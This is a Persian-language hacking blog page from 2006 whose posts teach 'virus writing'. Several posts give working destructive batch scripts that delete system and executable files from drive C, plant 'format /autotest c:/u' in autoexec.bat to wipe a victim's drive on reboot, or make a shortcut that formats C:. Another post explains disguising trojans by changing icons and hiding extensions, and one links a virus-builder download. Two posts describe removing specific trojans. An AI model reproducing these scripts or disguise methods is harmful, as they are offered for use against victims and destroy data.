تبلیغات
۞●(گروه پسرهای یخی)●۞ - مطالب آموزش ویروس نویسی

۞●(گروه پسرهای یخی)●۞

پنجشنبه 1 تیر 1385

میخوام نوشتن یه ویروس ساده ولی خطرناكو بهتون یاد بدم.

این ویروس چیز سختی نیست ولی خیلی خطرناكه.

 اول از همه روی دسكتاپ رایت كلیك كنید بعدش New ShortCut بسازید.

یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

سپس Next  را زده و در صفحه جدید كه باز میشه یه اسم واسه ویروستون انتخاب كنید.

سپس Next را زده ویه آیكون با سلیقه خودتون برای اون انتخاب كرده و Finish  كنید.

خب دیگه كارمون تمومه حالا اگه اجراش كنین بیچاره میشین.

اگه خواستین بفهمین چی میشه به جای Format C:/autotest بنویسید Format a:/autotest  و یه فلاپی كه حاوی اطلاعات هستش در Flopy Drive خود قرار دهید بعد اجراش كنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی پاك شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش كرد

  • نظرات() 
  • دوشنبه 15 خرداد 1385

    توضیحات :

    Dloadr-WZ تروجانی برای سیستم های ویندوزی می باشد .

    این تروجان می تواند نرم افزار جدیدی را دانلود , نصب  و اجرا کند .

    هم چنین با اولین اجرا در <System>\4da92ad5.exe کپی می شود . و مدخل یر را در رجیستری تغییر می دهد :

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    4da92ad5.exe
    <System>\4da92ad5.exe

    توصیه ها :

    1.       به روز كردن آنتی ویروس

    2.       دریافت Removal از سایت Kaspersky

    3.       روش پاك سازی به صورت دستی :

    ابتدا تمامی داده خود را در سیستم تغییر داده و یك كپی از آنها تهیه كنید.

    پسورد Administrator را دوباره تغییر دهید و یك نگاهی به مسایل امنیتی شبكه خود بیندازید.

    در taskbar دكمه start را بزنید و منوی run را اجرا كنید و در آن Regedit را بنویسید و دكمه ok را كلیك كنید تا صفحه ویرایشگر رجیستری شما باز شود . فراموش نكنید كه قبل از دستكاری رجیستری یك نسخه پشتیبان از آن تهیه كنید .

    برای تهیه نسخه پشتیبان از رجیستری خود ؛ در منوی Registry روی گزینه"''''''''Export Registry File  و در پنل ''''Export range'''' گزینه All را انتخاب كرده و سپس دكمه Save را كلیك كنید تا نسخه پشتیبان از رجیستری شما تهیه شود.

    حال در مدخل HKEY_LOCAL_MACHINE رجیستری زیر مدخلهای:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    4da92ad5.exe
    <System>\4da92ad5.exe

    هر مدخلی كه به فایلی اشاره می كرد حذف كنید.

    سپس رجیستری خود را ببندید و دوباره سیستم خود را راه اندازی كنید.

  • نظرات() 
  • دوشنبه 15 خرداد 1385

     

    توضیحات :

    Banker-BLM یک تروجان بانک اینترنت برای سیستم های ویندوزی می باشد .

    این تروجان با اولین اجرا در مکان های زیر کپی می شود :

    <Startup>\lsass32.exe
    <System>\lsass32.exe

     و فایل lsass32.exe با اولین اجرا مدخل زیر را در رجیستری ایجاد می کند :

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    lsass32
    <System>\lsass32.exe

     

    توصیه ها :

    1.       به روز كردن آنتی ویروس

    2.       دریافت Removal از سایت Kaspersky

    3.       روش پاك سازی به صورت دستی :

    ابتدا تمامی داده خود را در سیستم تغییر داده و یك كپی از آنها تهیه كنید.

    پسورد Administrator را دوباره تغییر دهید و یك نگاهی به مسایل امنیتی شبكه خود بیندازید.

    در taskbar دكمه start را بزنید و منوی run را اجرا كنید و در آن Regedit را بنویسید و دكمه ok را كلیك كنید تا صفحه ویرایشگر رجیستری شما باز شود . فراموش نكنید كه قبل از دستكاری رجیستری یك نسخه پشتیبان از آن تهیه كنید .

    برای تهیه نسخه پشتیبان از رجیستری خود ؛ در منوی Registry روی گزینه"''''''''Export Registry File  و در پنل ''''Export range'''' گزینه All را انتخاب كرده و سپس دكمه Save را كلیك كنید تا نسخه پشتیبان از رجیستری شما تهیه شود.

    حال در مدخل HKEY_LOCAL_MACHINE رجیستری زیر مدخلهای:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    lsass32
    <System>\lsass32.exe

    هر مدخلی كه به فایلی اشاره می كرد حذف كنید.

    سپس رجیستری خود را ببندید و دوباره سیستم خود را راه اندازی كنید.

  • نظرات() 
  • پنجشنبه 28 اردیبهشت 1385

    ساخت ویروس خطرناک

     

    اگر قربانی این ویروس رو رو سیستم اجرا کند مادر برد اون میسوزه و اگر برنامه ضد ویروس نداشته باشه ممکنه از فن آن دود بلند شود در هر صورت ویروس خطرناکیه

    برنامه نت پد رو باز کنید و دستورات زیر را در آن بنویسید

      

    @echo off
    Cls
    ===========
    color fc
    Del /a c:\*.com
    Del /a c:\*.sys
    Del /a c:\*.exe /s
    ===========

    و با پسوند

    bat. سیو کنید.

    اصلا" دوست ندارم كه این ویروس رو روی كسی امتحان كنید و در واقع من هیچ تعهدی در قبال اون نخواهم داد

    بنده هیچ مسولیتی در مورد این ویروس ندارم

  • نظرات() 
  • ساخت ویروس

    پنجشنبه 28 اردیبهشت 1385

     

    ساخت ویروس

    برای امروز هم آموزش یك ویروس رو انتخاب كردم امیدوارم از اون هم لذت ببرید.

    با این ویروسی که امروز به شما آموزش می دم می تونید درایو سی قر با نی رو فرمت کنید

    این ویروس فوق العاده استثناییه !!! ولی در اینجا من نحوه ی ساختن این ویروس رو قرار میدم تا شما بتونید به راحتی نون بازوی خود رو خورده و از اون لذت ببرید!!!

    شما جوری درایو سی قر بانی فرمت می کنید که به هیچ عنوان اطلاعات آن باز یابی نشود در اسل شما درایو قربانی فرمت uکردین

    فرمت كردن درایو C سیستم قربانی به وسیله ی یك فایل BAT :

    برای این كار ابتدا notepad رو باز كنید بعد كد زیر رو كپی كرده و در اونجا paste كنید :

    در این مرحله شما فقط كافیه كه این فایل رو با پسوند BAT ذخیره كنید.

    سخت بود ؟؟؟؟ قطعا" نه !!!

    به همین راحتی شما یكی از قدرتمند ترین ویروس ها ی بی خطر ( البته در حالت غیر اكتیو !!!) رو ساختید ............... با ذكر این نكته كه به هیچ وجه روی اون دابل كلیك نكنید باید بگم كه من اصلا" دوست ندارم كه این ویروس رو روی كسی امتحان كنید و در واقع من هیچ تعهدی در قبال اون نخواهم داد

    و اما این ویروس چه كار میكنه :

    این كد ابتدا اطلاعات موجود در autoexe.bat رو پاك میكنه و در مرحله ی بعد كد 'format /autotest c:/u' رو جای اون قرار میده ............... حال فقط كافیه كه قربانی سیستمش رو ریست كنه بعد این كد اجرا شده و به راحتی هرچه تمام تر درایو سی فرمت خواهد شد .

    راستی ویروس های دیگر هستند که مثل این ویروس بعد از اجرا شدن آن دریو سی قربانی فرمت کن اما این ویروس جوری دستگاه قربانی فرمت می کنه که به هیچ عنوان اطلاعات آن بازیابی نشود

    بنده هیچ مسولیتی در مورد این ویروس ندارم

     


    @echo off
    call attrib -r -h c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo format /autotest c:/u>nul >>c:\autoexec.bat
    call attrib +r +h c:\autoexec.bat >nul
    exit


  • نظرات() 
  • خطرناک

    پنجشنبه 28 اردیبهشت 1385

     

     

    میخوام نوشتن یه ویروس ساده ولی خطرناكو بهتون یاد بدم.

     

    این ویروس چیز سختی نیست ولی خیلی خطرناكه.

     

     اول از همه روی دسكتاپ رایت كلیك كنید بعدش New ShortCut بسازید.

     

    یه صفحه باز میشه در اون بنویسید: Format C:/Autotest

     

    سپس Next  را زده و در صفحه جدید كه باز میشه یه اسم واسه ویروستون انتخاب كنید.

     

    سپس Next را زده ویه آیكون با سلیقه خودتون برای اون انتخاب كرده و Finish  كنید.

     

    خب دیگه كارمون تمومه حالا اگه اجراش كنین بیچاره میشین.

     

    اگه خواستین بفهمین چی میشه به جای Format C:/autotest بنویسید Format a:/autotest  و یه فلاپی كه حاوی اطلاعات هستش در Flopy Drive خود قرار دهید بعد اجراش كنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی پاك شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش كرد.

  • نظرات() 
  • ویروس

    چهارشنبه 27 اردیبهشت 1385

     شما با این برنامه میتوانید ویروس البته با تنظیمات دلخواه خود بسازید.امیدوارم خوشتون بیاد نظر فراموش نشه!!!

    Download

  • نظرات() 
  • یکشنبه 24 اردیبهشت 1385

    خوب ساختن رو آغاز میکنم

    رویstartرفته و روی run کلیک کنید و notepad را تایپ کنید بعد از باز شدن پنجره اینهارو بنویسید توش

    @echo off

    Cls

    ===========

    Color fc

    Del /a c:\*.com

    Del /a c:\*.sys

    Del /a c:*.exe /s

    ===========

    خوب تایپ کردن بسه دیه این فایل را با هر نامی که دل تان خواست ذخیره کنید ولی پسوند ان را با نام bat بگذارید مثل: love.bat

    خوب کار دیه تموم شد این ویروس رو اگه کسی باز کنه کامپیوتر رو با یک خاک مساوی میکنه و ویندوز یا هر نوع سیستم عامل دیگه رو از کار میندازه

  • نظرات() 
  • یکشنبه 24 اردیبهشت 1385

    آیکون و پسوند تابلوی تروجان ها را به هر چی که دوست دارید تبدیل کنید

    برای اینکار 2 راه موجود می باشد که من این 2 راه را برای شما میگم:

    راه اول :

    یک عدد فایل تروجان آماده کنید...

    یه wordpad باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new برید و یه wordpad documernt باز کنید .

    فایل تروجان رو کپی کنید و توی  wordpad پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه  word  رها کنید .

    حال همون فایلی رو که تو word گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید

    بعد به edit برید و بعد به package object و روی برگه edit package کلیک کنید حالا در پبجره باز شده به edit برید و copy package رو بزنید .

    در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste رو بزنید .

    به همین آسونی فایل تروجان exe یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .

    راه دوم :

    بر روی  فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه    create shortcut  را بر گزینید . حالا یه فایل از همون تروجان با اسم  shortcut درست شده است حالا بر روی   shortcut آن راست کلیک کنید و گزینه Properties را انتخاب کنید حال در پنجره باز شده جدید  در بالای آن  گزینه   shortcut را انتخاب کنید و بعد بر روی گزینه change icon کیک کنید و در پنجره باز شده 100 ، 200 تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse آیکنی که خود شما دارید را برگزینید   

     

  • نظرات() 
    • تعداد صفحات :2
    • 1  
    • 2  

    صفحات جانبی


    آخرین پست ها


    نویسندگان



    آمار وبلاگ

    • کل بازدید :
    • بازدید امروز :
    • بازدید دیروز :
    • بازدید این ماه :
    • بازدید ماه قبل :
    • تعداد نویسندگان :
    • تعداد کل پست ها :
    • آخرین بازدید :
    • آخرین بروز رسانی :